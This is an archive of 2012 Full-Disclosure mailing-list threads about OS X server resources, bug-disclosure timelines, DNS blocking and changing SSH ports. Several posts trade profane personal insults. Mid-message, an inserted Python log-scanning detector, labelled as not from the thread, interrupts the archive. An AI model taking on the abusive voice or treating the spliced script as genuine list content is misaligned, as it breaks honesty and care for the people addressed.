Re: [Full-disclosure] Preferred OSX Security/Server Lists
Yep, saw those. There's some good material there, but it is dated and I was hoping for more of a discussion environment like we have on the list (when we actually discuss security here). I'm just a bit surprised as most of the hacks all run Mac. But I guess they don't run it in a production environment and serve up public services. That said, look at the Focus-MS list… With constant barrage of MSFT configuration questions and security requirements, there's not been a single post there in years it seems…

t

On 7/11/12 3:38 PM, Jeffrey Walton noloa...@gmail.com wrote:

On Wed, Jul 11, 2012 at 6:00 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:

Same here… I couldn't find anything that really served my needs. It was hard enough to find the right resource to enable a single user to have multiple email addresses for OSX Lion Server Mail but I figured that out. Maybe we should start one then? I'm moving the HoG website over as well and I'll be including the Wiki stuff, so I'll have the resources to host something like that.

[SNIP]

https://www.google.com/#hl=ensclient=psy-abq=osx+server+security+configuration+guide

The first two hits are the NSA and Apple.

Jeff
Re: [Full-disclosure] Preferred OSX Security/Server Lists
Hey, no worries at all… I appreciate the response! The more infoz the better! I'll check these out too…

On 7/11/12 5:53 PM, Jeffrey Walton noloa...@gmail.com wrote:

Hi Thor, My bad. I was not sure if you wanted a check list or mailing list. https://lists.apple.com/mailman/listinfo. The server stuff looks like it's covered under https://lists.apple.com/mailman/listinfo/macos-x-server. There's a low volume security list at https://lists.apple.com/mailman/listinfo/apple-cdsa.

Jeff

On Wed, Jul 11, 2012 at 8:44 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:

Yep, saw those. There's some good material there, but it is dated and I was hoping for more of a discussion environment like we have on the list (when we actually discuss security here). I'm just a bit surprised as most of the hacks all run Mac. But I guess they don't run it in a production environment and serve up public services. That said, look at the Focus-MS list… With constant barrage of MSFT configuration questions and security requirements, there's not been a single post there in years it seems…

On 7/11/12 3:38 PM, Jeffrey Walton noloa...@gmail.com wrote:

On Wed, Jul 11, 2012 at 6:00 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:

Same here… I couldn't find anything that really served my needs. It was hard enough to find the right resource to enable a single user to have multiple email addresses for OSX Lion Server Mail but I figured that out. Maybe we should start one then? I'm moving the HoG website over as well and I'll be including the Wiki stuff, so I'll have the resources to host something like that.

[SNIP]

https://www.google.com/#hl=ensclient=psy-abq=osx+server+security+configuration+guide

The first two hits are the NSA and Apple.
Re: [Full-disclosure] How much time is appropriate for fixing
Moral obligation to disclosing bugs? Really? The statement wasn't about what happens when there is disclosure or the effect it has - the statement was in regard to the purpose one does the research and subsequent disclosure in the first place. It is, quite simply, to be recognized. I didn't say anything was wrong with that, I was just stating that it is. People do not disclose their research to make the world a better place. They do it for recognition or for money. One may argue they are related. Are you telling me that these people intentionally begin researching some random product because they have some duty to ensure a fix is produced? If you think that, you are quite naïve. People certainly report bugs anonymously, but those are bugs they happen upon, not those they set out to find. Just look at how many bugs are released anonymously. Statistically none. You paint the picture as if people volunteer hours upon hours of research into any random product to find a bug so that they can ensure a fix is produced, as if they have some duty to do so. Nuts, man. Oh, and your reference to Maslow actually makes my point. The most basic need is sex (getting laid). The next most basic need is employment (getting paid). The next tier is sexual intimacy (getting laid), the next is achievement (getting paid) and finally the acceptance of facts that everything you do is to get paid or get laid. But as Val said, this thread has about run its course, and there's not been much new material on the subject (even though Григорий Братислава has provided needed entertainment).

On 7/10/12 9:15 AM, Justin Klein Keane jus...@madirish.net wrote:

Hello, I feel compelled to point out that disclosing a bug *is* contributing. It requires a lot of time and effort to find a bug, which is a contribution to the target software, even if only seen as free quality assurance work. Disclosure is undeniably inconvenient for vendors, but it is demonstrably one of the surest ways to ensure a fix is developed. Security researchers arguably have as much responsibility to end users as to vendors. If a researcher finds a bug, unless they believe they are the best person in the world at what they do, they must conclude black hats have access to the bug. Disclosing the bug is the lowest resistance way for a researcher to concurrently inform the user base and provide impetus for the vendor to fix the issue. The proposition that disclosure is purely selfish ego stroking ignores the viewpoint that disclosure is a moral obligation, which is just as valid. Maslow's hierarchy of needs clearly illustrates that not everyone is motivated by getting paid or getting laid.

Justin C. Klein Keane
http://www.MadIrish.net

On 7/10/12 11:42 AM, Mikhail A. Utin wrote:

Hello, I completely agree with Thor. We have to do something for free. We have to contribute, not just use. Whoever and whatever. Examples:
- This list is run for free (hardware, software, time, energy are used for it) and gives us a chance to communicate
- Most of us use Linux, whichever flavor you prefer. Most of it is free time contribution. Somebody pays for that, but we use it.
It is nice to be paid for something, but consider the alternative. Otherwise our communications will die and we do not have an OS for fun or profit.

Mikhail Utin

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of full-disclosure-requ...@lists.grok.org.uk
Sent: Tuesday, July 10, 2012 7:00 AM
To: full-disclosure@lists.grok.org.uk
Subject: Full-Disclosure Digest, Vol 89, Issue 11

-- Message: 7
Date: Mon, 9 Jul 2012 17:24:51 +
From: Thor (Hammer of God) t...@hammerofgod.com
Subject: Re: [Full-disclosure] How much time is appropriate for fixing a bug?
To: Georgi Guninski gunin...@guninski.com, Stefan Kanthak stefan.kant...@nexgo.de
Cc: full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk
Message-ID: cc205e3d.3561%t...@hammerofgod.com
Content-Type: text/plain; charset=Windows-1252

I'm not contradicting myself at all - in fact, *you* are the exact type of person I'm talking about. You couldn't give a rat's ass about the industry or anyone but yourself. Nothing you have ever done has been valuable to anyone other than you; it has been completely self-serving egotistical bullshit.
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
I replied all; the statement was to Guninski alone. Even if I didn't, this is a mailing list and grammar or spelling don't matter. Note I won't mention your use of proffering. Regardless, let's see if I understand you. You are saying one should not agree with someone who ascribes behavioral (our spelling) patterns to others based on their own character traits, yet you are telling him he cannot possibly agree. It's OK for you to tell him what he can or can't believe in, but it's not OK for me to voice my own opinion? How exactly does that make you any different than I? Did Georgi find some bugs in software that anyone could have found a decade ago? Sure. And good for him. My point was the WAY he went about working with the vendor and disclosing it. Defend him all you like, but no one was helped in those cases, and many many people were hurt. This isn't opinion, this is fact you can look up for yourself. Look at people like Michal Zalewski - he discovered god knows how many bugs in god knows how many browsers and he was professional about the whole thing. If you are actually arguing against the claim that disclosure is an ego-driven process (again, where purposefully and deliberately sought after) and are defending Georgi at the same time then all I can do is wish you luck with your life's perceptions. You are of course free to think what you want, how you want, and when you want - I'll just disagree with you.

t

On 7/10/12 3:40 PM, paul.sz...@sydney.edu.au wrote:

Dear Mikhail,

From: Thor (Hammer of God) t...@hammerofgod.com
To: Georgi Guninski gunin...@guninski.com, Stefan Kanthak stefan.kant...@nexgo.de
Cc: full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk

I'm not contradicting myself at all - in fact, *you* are the exact type of person I'm talking about. You couldn't give a rat's ass about the industry or anyone but yourself. Nothing you have ever done has been valuable to anyone other than you; it has been completely self-serving egotistical bullshit.

I completely agree with Thor. ...

You cannot possibly agree with someone who addresses two people in the singular. You should not agree with someone who ascribes behavioural patterns to others, based on his own character traits. Are you familiar with Georgi's work? Please look at his website before proffering opinions.

Cheers, Paul

Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics, University of Sydney, Australia
Re: [Full-disclosure] How much time is appropriate for fixing a bug?
I must not have articulated my point properly as it looks like we are both saying the same thing. What I was trying to convey was that if a person was actually concerned about the industry as opposed to self-promotion and ego-substantiation, then they would just notify the vendors and then get on with their lives irrespective of the vendors' ultimate remedy. As you say, there are any number of reasons why a vendor will or won't fix a bug, and/or when they will or won't fix it. The researcher will never know the requirements or considerations. In that respect, you have to trust the vendor - again, *IF* you are not concerned with self promotion. When a vendor fixes a bug, why do people then post details on their find once it is patched? For recognition. I'm not saying there's anything wrong with it - I've done it myself, purely for the reason of getting some acknowledgment. I was just commenting on the honesty of Joro's fuck 'em comment. I think any more on the subject will just result in another flare-up of FD vs RD vs FO vs GGF, so I'll probably not spend too much more time on the thread - but please feel free to add whatever you may think I've missed….

t

On 7/8/12 5:07 AM, Stefan Kanthak stefan.kant...@nexgo.de wrote:

Thor (Hammer of God) t...@hammerofgod.com wrote:

| Content-Type: multipart/mixed; boundary0734760750==

Please stop posting anything but text/plain.

If you really care about the security of the industry, then submit it and be done with it. If and when they fix it is up to them.

OUCH!? The industry will (typically) not fix any error if the cost for fixing exceeds the loss (or revenue) that this fix creates, including the vendor's gain/loss of reputation, gain/loss of stock value, loss of money in court cases or due to compensations, loss of (future) sales due to (dis-)satisfied customers, ... Joe Average can't tell the difference between a program which is designed, developed, built and maintained according to the state of the art, and some piece of crap that is not. He only sees the (nice or promising) GUI of the product and its price tag.

Stefan Kanthak
Re: [Full-disclosure] How much time is appropriate for fixing a bug?
I'm not contradicting myself at all - in fact, *you* are the exact type of person I'm talking about. You couldn't give a rat's ass about the industry or anyone but yourself. Nothing you have ever done has been valuable to anyone other than you; it has been completely self-serving egotistical bullshit. So you found a few bugs in Explorer. Wow! Congratulations… I'm sure your mommy is proud of little Joro. *ANYONE* could have found bugs in Explorer, and they did - you just did it in a full-blown look at me manner that ended up hurting more people than it helped (because it didn't help anyone). I'm amazed that you didn't burst into flame from the hypocritical charge of buzzwords. For the last 10 years or more, you've been the poster child of M$, Exploder, Windoze and any other number of 12-year-old-mentality buzzwords. The actual *facts* here are that you've never published *any* code of consequence (not that I've found) nor have you published and written works of any value. I've never seen any evidence of an actual job you have, or references of work that has contributed to the industry in any way. Yet you are a bitter critic of people who write code, you belittle people who publish, and you present yourself as an expert on corporate culture. In other words Georgi, you are completely full of shit. So yes, I stand by my [obviously tongue-in-cheek] statement of people do things for two reasons, to get paid or to get laid. You probably get both, but my guess is it is sourced within the same myopic scope of your world views.

t

On 7/9/12 3:20 AM, Georgi Guninski gunin...@guninski.com wrote:

On Sun, Jul 08, 2012 at 02:07:52PM +0200, Stefan Kanthak wrote:

Thor (Hammer of God) t...@hammerofgod.com wrote:

| Content-Type: multipart/mixed; boundary0734760750==

Please stop posting anything but text/plain.

If you really care about the security of the industry, then submit it and be done with it. If and when they fix it is up to them.

OUCH!? The industry will (typically) not fix any error if the cost for fixing exceeds the loss (or revenue) that this fix creates, including the vendor's gain/loss of reputation, gain/loss of stock value, loss of money in court cases or due to compensations, loss of (future) sales due to (dis-)satisfied customers, ... Joe Average can't tell the difference between a program which is designed, developed, built and maintained according to the state of the art, and some piece of crap that is not. He only sees the (nice or promising) GUI of the product and its price tag.

Stefan Kanthak

i agree that Thor is writing pure corporate crap. note that he is contradicting himself: in another thread he wrote basically people do stuff for money and getting laid. in this thread he is using the buzzwords self promotion/ego-substantiation which don't appear to fit the above model of motivation and are certainly wrong for most members of FD. probably in the next thread he will use the buzzword irresponsible. i suppose in his glass house world he expects hackers to give the 0days to vendors and keep silent, busting vendors' profits for free so they don't get accused of the ego related irresponsible crimes. f*ck it, i expect the final usa crisis to partially fix the model.
[Full-disclosure] Preferred OSX Security/Server Lists
Greets all. I was hoping to get some opinions on your favorite OSX security/server admin sites/lists. I'm converting the HoG internal and production networks over to OSX and OSX Server and would like some pre-vetting suggestions for a decent source of information. Thanks much.

t
Re: [Full-disclosure] How much time is appropriate for fixing a bug?
there is time for fixing and there is time for breaking

Ecclesiastes in the Hacker's Bible? :0
Re: [Full-disclosure] How much time is appropriate for fixing a bug?
Well, I have to say, at least he's being honest. If the guy is chomping at the bit to release the info so he can get some attention, then let him. That, of course, is what it is all about. He's not releasing the info so that the community can be safe by forcing the vendor to fix it. He's doing it so people can see how smart he is and that he found some bug. So Joro's reply of fuck em is actually refreshingly honest. Regarding how long does it take, it is completely impossible to tell. If someone fixed it in 10 minutes, good for them. It could take someone else 10 months. Any time I see things like Wikipedia advising things like 5 months I have to lol. They have no freaking idea whatsoever as to the company's dev processes and the extent that the fix could impact legacy code or any number of other factors. I would actually have expected code bug-finders to have a better clue about these things, but apparently they don't. MSFT's process is nuts – they have SO many dependencies, so many different products with shared code, so many legacy products, so many vendors with drivers and all manner of other stuff that the process is actually quite difficult and time consuming. Oracle is worse – they have the same but multiplied by x platforms. Apple I think has it the easiest of the big ones, but even OSX is massively complex (and completely awesome). It is all about intent: if you want to be recognized publicly for some fame or whatever, just FD it because chances are you will anyway. If you really care about the security of the industry, then submit it and be done with it. If and when they fix it is up to them.

t

From: Gary Baribault g...@baribault.net
Date: Friday, July 6, 2012 7:59 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] How much time is appropriate for fixing a bug?

Hey Georgi, Didn't take your happy pill this morning? I would say that the answer depends on how the owner/company answers you; if you feel that they're stringing you along and you have given them some time, then warn them that you're publishing, give them 24 hours and then go for it. Obviously it depends on the bug and the software. A major bug in a large program will take longer, and so long as they are talking to you, and you don't miss your morning happy pill, you can wait; a small bug in a small program shouldn't take as long. There is no one answer to your question: if you are having an interactive discussion with them, then be patient; otherwise, Georgi's answer is a good one if they are ignoring you or stringing you along.

Gary B

On 07/06/2012 10:33 AM, Georgi Guninski wrote:

On Wed, Jul 04, 2012 at 10:49:18PM +0200, Jann Horn wrote:

After having reported a security-relevant bug about a smartphone, how long would you wait for the vendor to fix it? What are typical times? I remember telling someone about a security-relevant bug in his library some time ago - he fixed it and published the fixed version within ten minutes. On the other hand, I often see mails on bugtraq or so in which the given dates show that the vendor took maybe a year or so to fix the issue...

when i was young i asked a similar question. if you ask me now, the short answer is fuck them, if you are killing a bug the time is completely up to you. responsible disclosure is just a buzzword (the RFC on it failed). you have bugs, they don't have.
Re: [Full-disclosure] How much time is appropriate for fixing a bug?
I already covered that – if they don't fix it, then publish it. Also, if a vendor has a vulnerability to the community, then they would obviously fix it. There's no responsibility to disclose anything. FD doesn't exist to satisfy some requirement for researchers to publish vulnerabilities – it exists so that people can market themselves. The we must disclose this so that people will know and they can protect themselves is simply a justification for the aforementioned. These people don't give a fat fuck about the industry or protecting other people. If they did, they would just post hey, there's a vuln in this product, email me and I'll tell you about it. When no-one emails them (because this limited audience doesn't care) they don't get their deserved cred and post it. Nobody cares, and nobody remembers… his FD will simply be another tit in the peep show. People like 0DayInit and Litchfield did it the SMART way. They have a client base who have purchased a product to protect them from these vulnerabilities. People who purchase the product are protected in the meantime, as the vuln is actually addressed in the product. It actually works in favor of the vendor to take longer as it makes the product more valuable. Vendors want responsible disclosure so they can assign priority to plan release cadence. Disclosers want recognition, or payment, or both. Each will do what is in their own best interest. But let's not pretend it is anything other than what it is.

t

From: Peter Dawson slash...@gmail.com
Date: Friday, July 6, 2012 10:24 AM
To: Timothy Mullen t...@hammerofgod.com
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] How much time is appropriate for fixing a bug?

Thor (Hammer of God): If and when they fix it is up to them.

so if vendor don't fix it /ack the bug.. then what ?? Responsibility works both ways.. Advise the vendor.. if they say fuck it.. I say fuck u.. and will advise the community ! There is a responsibility to disclose a vulnerability to the community so that they can take down/block/deactivate a service. All that is necessary for the triumph of evil is that good men do nothing. -whoever ..fuck it !

/pd

On Fri, Jul 6, 2012 at 12:46 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:

Well, I have to say, at least he's being honest. If the guy is chomping at the bit to release the info so he can get some attention, then let him. That, of course, is what it is all about. He's not releasing the info so that the community can be safe by forcing the vendor to fix it. He's doing it so people can see how smart he is and that he found some bug. So Joro's reply of fuck em is actually refreshingly honest. Regarding how long does it take, it is completely impossible to tell. If someone fixed it in 10 minutes, good for them. It could take someone else 10 months. Any time I see things like Wikipedia advising things like 5 months I have to lol. They have no freaking idea whatsoever as to the company's dev processes and the extent that the fix could impact legacy code or any number of other factors. I would actually have expected code bug-finders to have a better clue about these things, but apparently they don't. MSFT's process is nuts – they have SO many dependencies, so many different products with shared code, so many legacy products, so many vendors with drivers and all manner of other stuff that the process is actually quite difficult and time consuming. Oracle is worse – they have the same but multiplied by x platforms. Apple I think has it the easiest of the big ones, but even OSX is massively complex (and completely awesome). It is all about intent: if you want to be recognized publicly for some fame or whatever, just FD it because chances are you will anyway. If you really care about the security of the industry, then submit it and be done with it. If and when they fix it is up to them.

t

From: Gary Baribault g...@baribault.net
Date: Friday, July 6, 2012 7:59 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] How much time is appropriate for fixing a bug?

Hey Georgi, Didn't take your happy pill this morning? I would say that the answer depends on how the owner/company answers you; if you feel that they're stringing you along and you have given them some time, then warn them that you're publishing, give them 24 hours and then go for it. Obviously it depends on the bug and the software. A major bug in a large program will take longer, and so long as they are talking to you, and you don't miss your morning
Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?
I think he was referring to a DNS blockade ala SOPA. Though the suggestion was painfully obvious (and that I pointed out the HOSTS file a few days back) it does show the level of complete ignorance on the part of any legislator who thinks a DNS blockade will, in any way, affect access to pirate sites. Of course, we all know it is simply record industry lobbying to make the government pay to enforce copyright infringement so that they don't have to. It really is quite a nice scam on their part: don't invest in any real DRM, and make someone else pay to enforce your IP. Nice.

Timothy Thor Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Michael Stummvoll
Sent: Wednesday, June 27, 2012 4:24 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

Hi,

Do you know? Even in a DNS takedown you can access your favourite sites.

The more interesting question is: how possible is a complete DNS takedown? I don't feel that this is a real danger to the internet. From the technical side, DNS is decentralized. All the root servers are designed to handle a fail/takedown of 2/3 of the DNS servers. From the political side, the current public DNS is controlled by the ICANN and so (theoretically) by the USA. But I think, if they would abuse their force too much, this just would bring more people to alternatives like OpenNIC.

Kind Regards,
Michael
Re: [Full-disclosure] server security
Well, even if they are trying to get into your network specifically, you make them do more work. They have to scan *and* identify the services. The more scanning, fingerprinting, posting, peeking and poking they do (see what I did there? :) ) the louder they are and the more likely the attack is to be detected. This particular subject continues to come up, and there continues to be debate about the value, but I actually don't see how it can't be viewed as a security control, albeit a relatively trivial one to bypass. Security in depth works.

Timothy Thor Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Daniel Hadfield
Sent: Thursday, June 21, 2012 12:49 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] server security

It depends what the attacker's motive is. Is he/she trying to get as many machines infected as he/she can? Or is he/she trying to get into YOUR network?

My 2c

On 21/06/2012 20:20, Thor (Hammer of God) wrote:

I completely agree with Gage. The way I see it, security through obscurity is perfectly valid as long as the control remains obscured. I think the anyone can just scan your ports is somewhat specious in that most (if not something like 99% or so (unqualified opinion of course)) traffic is simply noise and scans for standard ports. This is particularly true when it matters most: during a worm outbreak or a newly published vulnerability. Attackers simply don't have the time nor the inclination to go through and perform slow and loud scans when they can quickly move on to the next target. If 90% of the targets have services on the default ports, then it makes far more sense to just go after the easy targets. Perfect case-in-point is the recent RDP unpleasantness. Non-standard port deployments were automatically removed from the target scans for 3389. I don't see how anyone can argue against the security value of such a configuration.

t

Timothy Thor Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom
Sent: Thursday, June 21, 2012 9:25 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] server security

Well that's a bit of an iffy one. I'd say it IS a security measure, albeit one that is solely effective if and only if compounded with other measures. It's unlikely, but you never know, you just might miss out on a nasty worm all because you weren't running on a default port one day.

On Thu, Jun 21, 2012 at 8:52 AM, Rob sy...@synfulvisions.com wrote:

We need to make a distinction between security and obscurity here. The only time changing ports actually hardens a service in any way is when the port requires elevated rights to bind; changing to 1025 for example removes the root requirement. Any actual or theoretical vulnerabilities still exist. If somebody is looking at your server, they'll find the port without much trouble. Alternate ports can remove junk traffic from logs, so there is a benefit, if not entirely a security one.

Rob

-Original Message-
From: Alex Dolan dolan.a...@gmail.com
Sender: listbou...@securityfocus.com
Date: Thu, 21 Jun 2012 07:44:57
To: Littlefield, Tyler ty...@tysdomain.com
Cc: security-bas...@securityfocus.com
Subject: Re: server security

One tip I have is to set SSH to a port other than 22. I don't need to tell anyone how devastating it is if someone did actually get access to that service. Putting it on some other port reduces your risk.

On Thu, Jun 21, 2012 at 1:27 AM, Littlefield, Tyler ty...@tysdomain.com wrote:

Hello: I have a couple questions. First, I'll explain what I did: I set up iptables and removed all unwanted services. Iptables blocks everything, then only opens what it wants. I also use the addrtype module to limit broadcast and unspec addresses, etc. I also do some malformed packet work where I just drop everything that looks malformed (mainly by the flags).
2) I secured ssh: blocked root logins, set it up so only users in the sshusers group can connect, and set it only to allow ppk.
3) I installed aid.
4) disabled malformed packets and forwarding/etc in sysctl.
This is a basic web server that runs email, web and a couple other things. It's only running on a linode512, so I don't have the ability to set up a ton of stuff; I also think that would make things more of a mess. What else would be recommended? Also, I'm looking to add something to the web server; sometimes I notice that there are a lot of requests from people scanning for common urls like wordpress/phpbb3/etc, what kind of preventative measures
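Tyler's closing question, what to do about clients scanning for common URLs like wordpress/phpbb3, as an added example that is not code from anyone in the thread: a small Python detector that parses Apache combined-format access logs, flags clients that request several well-known application paths the server does not host, and emits iptables DROP rules in the style of the firewall Tyler describes. The log lines, client addresses (RFC 5737 documentation ranges) and the probe-path list are all constructed here for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set

# Constructed sample access-log lines in Apache "combined" format. The
# addresses come from the RFC 5737 documentation ranges, not from real clients.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Jun/2012:20:01:01 +0000] "GET /wp-login.php HTTP/1.1" 404 169 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Jun/2012:20:01:02 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 404 169 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Jun/2012:20:01:03 +0000] "GET /phpbb3/ucp.php?mode=login HTTP/1.1" 404 169 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Jun/2012:20:01:04 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 169 "-" "Mozilla/5.0"
198.51.100.20 - - [21/Jun/2012:20:02:10 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.20 - - [21/Jun/2012:20:02:11 +0000] "GET /about.html HTTP/1.1" 200 2048 "http://example.org/" "Mozilla/5.0"
192.0.2.44 - - [21/Jun/2012:20:03:00 +0000] "GET /wp-admin/ HTTP/1.1" 404 169 "-" "curl/7.22"
this line is not a valid log record
"""

# Path prefixes for applications this (hypothetical) server does not run.
# A client asking for several of them is fingerprinting, not browsing.
PROBE_PREFIXES = (
    "/wp-login.php", "/wp-admin", "/wordpress", "/xmlrpc.php",
    "/phpbb", "/phpmyadmin", "/pma", "/administrator",
)

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format record; return None for lines that do not match,
    so a malformed or truncated record never crashes the detector."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_probe(path: str) -> bool:
    """True when the request path (query string ignored, case-insensitive)
    targets one of the applications we know this server does not host."""
    p = path.split("?", 1)[0].lower()
    return any(p.startswith(prefix) for prefix in PROBE_PREFIXES)


def find_scanners(lines, threshold: int = 3) -> Dict[str, Set[str]]:
    """Return {client_ip: distinct probe paths} for clients that requested at
    least `threshold` distinct probe paths and got a 404 for each of them.
    Requiring the 404 keeps a legitimate user of a hosted app out of the list."""
    hits: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["status"] == 404 and is_probe(rec["path"]):
            hits[rec["ip"]].add(rec["path"].split("?", 1)[0])
    return {ip: paths for ip, paths in hits.items() if len(paths) >= threshold}


def iptables_rules(scanners: Dict[str, Set[str]]) -> List[str]:
    """Render one iptables rule per flagged client, in the form accepted by
    iptables-restore, to be reviewed before loading."""
    return [f"-A INPUT -s {ip} -j DROP" for ip in sorted(scanners)]


if __name__ == "__main__":
    flagged = find_scanners(SAMPLE_LOG.splitlines())
    for ip, paths in flagged.items():
        print(f"{ip}: {len(paths)} probe paths -> {sorted(paths)}")
    print("\n".join(iptables_rules(flagged)))
```

A single request to /wp-admin/ (as from 192.0.2.44 above) stays below the threshold on purpose; one stray 404 is not evidence of scanning.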
Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?
What, no one uses the HOSTS file anymore?

Timothy "Thor" Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible: http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Nate Theis
Sent: Monday, June 25, 2012 12:28 PM
To: jweyr...@gmail.com
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

> And don't forget lists.grok.org.uk 127.0.0.1
>
> On Jun 25, 2012 11:15 AM, Jardel jweyr...@gmail.com wrote:
>> Do you know? Even in a DNS takedown you can access your favourite sites. People may think that in a DNS shutdown they can lose access to the websites they are addicted to. But after reading this article you will know how easily you can access your websites. You can access them by typing their IP address into your web browser. Copy the IP addresses given below:
>>
>> tumblr.com 174.121.194.34
>> wikipedia.org 208.80.152.201
>>
>> Original Article: http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Sunday Fodder
For the FB'ers out there, the "Hacker News" (arguably accurate) has posted an incendiary photo alleging a US soldier posing with the dead and supposedly engaged in "The Ichabod." The funny part of it is to go through and count the number of posts that threaten the lives of Americans; each one of these poor sods' accounts is going to have its full history dumped, stored, and analyzed. Though they didn't do it on purpose, it is a very good example of how to socially manipulate behavior.

https://www.facebook.com/thehackernews

Timothy "Thor" Mullen
www.hammerofgod.com
Security isn't about thinking outside the box. It's about not thinking yourself into it.
Thor's Microsoft Security Bible: http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727
Re: [Full-disclosure] Sunday Fodder
Hey, this clearly paid off!!! http://www.bbc.co.uk/news/technology-16810312 LOL

Timothy “Thor” Mullen
www.hammerofgod.com
Thor’s Microsoft Security Bible

-----Original Message-----
From: Darius Jahandarie [mailto:djahanda...@gmail.com]
Sent: Sunday, June 24, 2012 1:15 PM
To: Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Sunday Fodder

> On Sun, Jun 24, 2012 at 4:06 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:
>> For the FB’ers out there, the “Hacker News” (arguably accurate) has posted an incendiary photo alleging US soldier posing with the dead and supposedly engaged in “The Ichabod.” The funny part of it is to go through and count the number of posts that threaten the lives of Americans; each one of these poor sods’ accounts are going to have their full history dumped, stored, and analyzed.
>
> Hey, if the US government realizes this sort of pre-attack investigation stuff works better than their security theater at the airports, maybe my day-to-day life will improve.
>
> --
> Darius Jahandarie
Re: [Full-disclosure] server security
I completely agree with Gage. The way I see it, security through obscurity is perfectly valid as long as the control remains obscured. I think the "anyone can just scan your ports" argument is somewhat specious in that most (if not something like 99% or so (unqualified opinion of course)) traffic is simply noise and scans for standard ports. This is particularly true when it matters most: during a worm outbreak or a newly published vulnerability. Attackers simply don't have the time nor the inclination to go through and perform slow and loud scans when they can quickly move on to the next target. If 90% of the targets have services on the default ports, then it makes far more sense to just go after the easy targets. Perfect case-in-point is the recent RDP unpleasantness. Non-standard port deployments were automatically removed from the target scans for 3389. I don't see how anyone can argue against the security value of such a configuration.

t

Timothy "Thor" Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom
Sent: Thursday, June 21, 2012 9:25 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] server security

> Well that's a bit of an iffy one. I'd say it IS a security measure, albeit one that is solely effective if and only if compounded with other measures. It's unlikely, but you never know, you just might miss out on a nasty worm all because you weren't running on a default port one day.
>
> On Thu, Jun 21, 2012 at 8:52 AM, Rob sy...@synfulvisions.com wrote:
>> We need to make a distinction between security and obscurity here. The only time changing ports actually hardens a service in any way is when the port requires elevated rights to bind; changing to 1025, for example, removes the root requirement. Any actual or theoretical vulnerabilities still exist. If somebody is looking at your server, they'll find the port without much trouble. Alternate ports can remove junk traffic from logs, so there is a benefit, if not entirely a security one.
>>
>> Rob
>> Sent on the Sprint® Now Network from my BlackBerry®
>>
>> -----Original Message-----
>> From: Alex Dolan dolan.a...@gmail.com
>> Sender: listbou...@securityfocus.com
>> Date: Thu, 21 Jun 2012 07:44:57
>> To: Littlefield, Tyler ty...@tysdomain.com
>> Cc: security-bas...@securityfocus.com
>> Subject: Re: server security
>>
>>> One tip I have is to set SSH to a port other than 22. I don't need to tell anyone how devastating it is if someone did actually get access to that service. Putting it on some other port reduces your risk.
>>>
